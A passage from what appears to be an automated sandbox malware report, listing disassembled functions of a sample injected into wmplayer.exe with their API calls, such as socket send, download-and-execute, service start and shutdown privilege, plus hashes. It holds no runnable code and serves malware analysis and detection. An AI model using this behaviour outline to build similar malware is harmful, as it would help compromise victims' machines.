                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                            Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00D8BAC8,00000010), ref: 004042A5
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                            • String ID:
                                                                                            • API String ID: 4043647387-0
                                                                                            • Opcode ID: 2b5c3e16c52d8ae42d7e33b302a4e7d818ac0825cd30324b09a5a6da171318b9
                                                                                            • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                            • Opcode Fuzzy Hash: 2b5c3e16c52d8ae42d7e33b302a4e7d818ac0825cd30324b09a5a6da171318b9
                                                                                            • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                            Function 00419BC4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                            • String ID:
                                                                                            • API String ID: 276877138-0
                                                                                            • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                            • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                            • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                            Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                            • API String ID: 1589313981-1420736420
                                                                                            • Opcode ID: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                            • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                            • Opcode Fuzzy Hash: 9ae4c03283453911d56bba14c892a11426fe9fc09d18274aabc6115ba453b6e1
                                                                                            • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                            Function 004511E3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 0045127C
                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451502,?,00000000), ref: 004512A5
                                                                                            • GetACP.KERNEL32(?,?,00451502,?,00000000), ref: 004512BA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 2299586839-711371036
                                                                                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                            • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                            Function 0041A63F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                            • String ID: SETTINGS
                                                                                            • API String ID: 3473537107-594951305
                                                                                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                            • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                            Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00407A91
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 1157919129-0
                                                                                            • Opcode ID: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                            • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                            • Opcode Fuzzy Hash: 160c2ace42af5551170b97460db2d1c7e9fc336bd47d0bf9be650831b42887ab
                                                                                            • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                            Function 0044800F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                            • _free.LIBCMT ref: 00448067
                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            • _free.LIBCMT ref: 00448233
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 1286116820-0
                                                                                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                            • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                            Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DownloadExecuteFileShell
                                                                                            • String ID: C:\Program Files (x86)\Windows Media Player\wmplayer.exe$open
                                                                                            • API String ID: 2825088817-2139661930
                                                                                            • Opcode ID: 2c5ecccaf9d8d6300355a8c97ec3bc5bb5caa3e4c444b5e8748fd5da19bd459b
                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                            • Opcode Fuzzy Hash: 2c5ecccaf9d8d6300355a8c97ec3bc5bb5caa3e4c444b5e8748fd5da19bd459b
                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                            Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNextsend
                                                                                            • String ID: x@G$x@G
                                                                                            • API String ID: 4113138495-3390264752
                                                                                            • Opcode ID: 3e4db3184a84fc6328c8a8d029d36169df7b41c99c804fe7392dd3c718430463
                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                            • Opcode Fuzzy Hash: 3e4db3184a84fc6328c8a8d029d36169df7b41c99c804fe7392dd3c718430463
                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                            Function 0041BB77 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                            • API String ID: 4127273184-3576401099
                                                                                            • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                            • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                            Function 00450A7F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                            • String ID:
                                                                                            • API String ID: 4212172061-0
                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                            Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                            • String ID:
                                                                                            • API String ID: 301083792-0
                                                                                            • Opcode ID: 0d14dffab37c74e2ef2fdf1d452f6a773de622bb137113ec2d38ebded55a711f
                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                            • Opcode Fuzzy Hash: 0d14dffab37c74e2ef2fdf1d452f6a773de622bb137113ec2d38ebded55a711f
                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                            Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 2829624132-0
                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                            Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                            Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                            • String ID:
                                                                                            • API String ID: 3906539128-0
                                                                                            • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                            • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                                                            • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                                                            • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                                                            Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
